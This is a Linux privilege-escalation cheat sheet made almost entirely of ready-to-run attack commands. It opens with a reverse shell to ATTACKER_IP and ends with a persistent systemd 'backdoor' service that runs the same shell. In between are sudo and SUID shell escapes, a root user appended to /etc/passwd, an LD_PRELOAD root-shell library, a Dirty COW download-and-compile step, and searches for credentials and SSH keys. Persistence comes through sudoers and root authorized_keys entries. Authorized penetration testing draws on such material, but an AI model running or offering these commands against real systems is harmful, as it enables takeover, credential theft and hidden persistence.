Linux Privilege Escalation

Nested Shell Strategy

Always create backup shells immediately after initial access

  1. Get initial shell via web exploit
  2. Immediately create second shell via different method
  3. Upgrade shells and maintain multiple access points

echo 'bash -i >& /dev/tcp/ATTACKER_IP/5678 0>&1'

Upgrade nested shell:

python3 -c 'import pty; pty.spawn("/bin/bash")'; export TERM=xterm
(Ctrl-Z)
stty raw -echo; fg

Phase 1: System Information Gathering

Basic System Info

# System details
uname -a
cat /etc/os-release
cat /etc/issue
ip a
hostname
whoami
id

# Current user info
groups
cat /etc/passwd | grep -E "(sh|bash)$"
cat /etc/group
sudo -l

Running Processes & Services

ps aux
ps -ef
systemctl list-units --type=service --state=running
netstat -tulpn
ss -tulpn

Process Monitoring with pspy

# Download and run pspy to monitor background processes
wget https://github.com/DominicBreuker/pspy/releases/latest/download/pspy64
chmod +x pspy64
./pspy64

# Look for:
# - Cron jobs running as root
# - Scripts with writable paths
# - Processes running with elevated privileges
# - File operations you can intercept

Phase 2: Automated Enumeration

LinPEAS (Primary Tool)

# Transfer and run LinPEAS (the one-liner below pipes an unverified remote script straight into a shell)
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

# Or download and run locally
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

LinEnum (Alternative)

curl -L https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | sh

Linux Exploit Suggester

curl -L https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh | sh

Phase 3: Manual Enumeration

SUID/SGID Binaries

# Find SUID binaries
find / -perm -4000 -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null

# Find SGID binaries
find / -perm -2000 -type f 2>/dev/null
find / -perm -g=s -type f 2>/dev/null

# Find files with capabilities
getcap -r / 2>/dev/null

World-Writable Files & Directories

# World-writable files (-perm -2); note that -writable instead lists files writable by the current user
find / -perm -2 -type f 2>/dev/null
find / -writable -type f 2>/dev/null

# World-writable directories (-perm -2); note that -writable instead lists directories writable by the current user
find / -perm -2 -type d 2>/dev/null
find / -writable -type d 2>/dev/null

Cron Jobs & Scheduled Tasks

# System cron jobs
cat /etc/crontab
ls -la /etc/cron*
cat /etc/cron.d/*
cat /var/spool/cron/crontabs/*

# User cron jobs
crontab -l
crontab -u root -l

# Systemd timers
systemctl list-timers

Environment Variables & PATH

echo $PATH
env
cat /etc/environment
cat /etc/profile
cat ~/.bashrc
cat ~/.profile

Phase 4: Common Privilege Escalation Vectors

Sudo Misconfigurations

sudo -l

Common sudo misconfigurations to exploit:

  • sudo su or sudo bash
  • NOPASSWD entries
  • Wildcards in commands
  • Environment variable preservation

GTFOBins Sudo Exploits

Check GTFOBins for sudo-enabled binaries:

# Examples:
sudo vi -c ':!/bin/sh' /dev/null
sudo awk 'BEGIN {system("/bin/sh")}'
sudo find . -exec /bin/sh \; -quit
sudo nmap --interactive

SUID Binary Exploitation

Common SUID Binaries to Check

# Check for unusual SUID binaries
ls -la /usr/bin/ | grep "^-rws"
ls -la /bin/ | grep "^-rws"
ls -la /usr/local/bin/ | grep "^-rws"

GTFOBins SUID Exploits

# Examples:
/usr/bin/cp /etc/passwd /tmp/passwd
echo 'user:$1$user$8m8D7FCn2M.FJh7CKDm5J/:0:0::/root:/bin/bash' >> /tmp/passwd
/usr/bin/cp /tmp/passwd /etc/passwd

# Base64 SUID example
echo "cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash" | base64
/usr/bin/base64 -d <<< "Y3AgL2Jpbi9iYXNoIC90bXAvcm9vdGJhc2g7IGNobW9kICtzIC90bXAvcm9vdGJhc2gK" | sh

Capabilities Exploitation

# If python has cap_setuid
/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

# If tar has cap_dac_read_search
tar -czf archive.tar.gz /etc/shadow

Path Hijacking

# If PATH includes the current directory or a writable directory
echo '/bin/bash' > /tmp/ls
chmod +x /tmp/ls
export PATH=/tmp:$PATH

Library Hijacking (LD_PRELOAD)

# Check whether sudo keeps LD_PRELOAD in the environment (env_keep)
sudo -l | grep LD_PRELOAD

# Create malicious library
cat > /tmp/shell.c << EOF
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash");
}
EOF

gcc -fPIC -shared -o /tmp/shell.so /tmp/shell.c -nostartfiles
sudo LD_PRELOAD=/tmp/shell.so apache2

Phase 5: Credential Hunting

Configuration Files

# Database configs
find / -name "*.conf" -o -name "*.config" -o -name "*.cfg" 2>/dev/null | grep -E "(database|db|mysql|postgres|mongo)"

# Web application configs
find /var/www -name "*.php" -o -name "*.config" -o -name "*.ini" 2>/dev/null
grep -r "password\|passwd\|pwd" /var/www/ 2>/dev/null

History Files

cat ~/.bash_history
cat ~/.mysql_history
cat ~/.nano_history
find /home -name ".*history" 2>/dev/null

SSH Keys

find / -name "id_rsa" -o -name "id_dsa" -o -name "id_ecdsa" -o -name "id_ed25519" 2>/dev/null
find / -name "authorized_keys" 2>/dev/null

Phase 6: Kernel Exploits

Kernel Version Check

uname -r
cat /proc/version
lsb_release -a

Common Kernel and Userland Local Exploits

  • CVE-2021-4034 (PwnKit) - pkexec vulnerability
  • CVE-2021-3156 (Baron Samedit) - sudo vulnerability
  • CVE-2017-16995 - eBPF verifier
  • CVE-2016-5195 (Dirty COW) - race condition in memory subsystem

Dirty COW Exploit

# Only if the kernel version is confirmed vulnerable (kernel exploits can crash the host)
curl -o dirty.c https://www.exploit-db.com/download/40611
gcc -pthread dirty.c -o dirty -lcrypt
./dirty

Phase 7: Service Exploitation

Docker Privilege Escalation

# If the user is in the docker group (membership is effectively root on the host)
docker run -v /:/mnt --rm -it alpine chroot /mnt sh

# Or mount just the host's /etc
docker run --rm -v /etc:/mnt/etc -it alpine vi /mnt/etc/passwd

Database Services

# MySQL running as root
mysql -u root -p
\! /bin/bash

# Check for MySQL UDF
searchsploit mysql udf

Web Services

# Apache/Nginx workers running as root (rare but possible; the master process normally runs as root, so check the worker processes)
ps aux | grep -E "(apache|nginx|httpd)" | grep root

Phase 8: Persistence & Post-Exploitation

Add User to Sudoers

echo "user ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers

Add SSH Key

mkdir -p /root/.ssh
echo "your_public_key" >> /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys
chmod 700 /root/.ssh

Backdoor Service

# Create systemd service
cat > /etc/systemd/system/backdoor.service << EOF
[Unit]
Description=Backdoor Service

[Service]
Type=simple
ExecStart=/bin/bash -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"
Restart=always

[Install]
WantedBy=multi-user.target
EOF

systemctl enable backdoor.service
systemctl start backdoor.service

Common Files to Check

Sensitive Files

/etc/passwd
/etc/shadow
/etc/group
/etc/sudoers
/etc/crontab
/var/log/auth.log
/var/log/secure
/home/*/.ssh/
/root/.ssh/

Application Configs

/var/www/html/config.php
/etc/apache2/sites-enabled/
/etc/nginx/sites-enabled/
/opt/*/config/
/usr/local/*/config/

Tools & Resources

Download Tools

# Essential enumeration tools (note: curl without -O/-o writes the download to stdout)
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
wget https://github.com/DominicBreuker/pspy/releases/latest/download/pspy64
curl -L https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh

Reference Sites

Next Steps

  1. Run automated tools first (LinPEAS)
  2. Follow up on findings with manual verification
  3. Test identified vectors systematically
  4. Document successful methods for reporting